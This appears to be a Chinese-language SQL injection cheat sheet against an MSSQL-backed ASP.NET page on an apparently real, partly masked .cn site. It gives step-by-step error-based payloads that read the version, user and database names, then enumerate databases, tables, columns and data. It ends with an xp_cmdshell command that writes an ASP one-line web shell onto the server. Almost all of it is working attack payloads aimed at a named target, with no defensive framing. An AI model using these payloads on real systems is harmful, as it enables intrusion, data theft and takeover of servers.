强制字符转成数字, 所以报错, 能获得数据 查版本号: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version=1-- 查数据库版本: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and db_name()=1-- 查当前数据库用户(如果看到dbo 那么多半当前数据库的用户是dba权限): http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and User_Name()=1-- 爆库: Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0 继续爆库: Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('爆出的库1', '爆出的库2'))>0 爆表: Zixun_show.aspx?id=1 and (select top 1 name from 数据库名字.sys.all_objects where type='U' AND is_ms_shipped=0)>0 再爆其他表: Zixun_show.aspx?id=1 and (select top 1 name from 数据库名字.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('爆出的表1', '爆出的表2'))>0 爆字段: Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from 数据库名字.information_schema.columns where TABLE_NAME='表名1')>0 爆其他字段: Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='表名1' and COLUMN_NAME not in('字段1','字段2'))>0 爆数据: Zixun_show.aspx?id=1 and (select top 1 字段1 from 数据库名.表名)>0 写shell: Zixun_show.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>" > d:KfSitekaifeng2.asp'-- @@version : Current Version user_name() : Current User user,system_user,current_user : Current User db_name() : Current Database db_name() : Current Database @@SERVERNAME : Hostname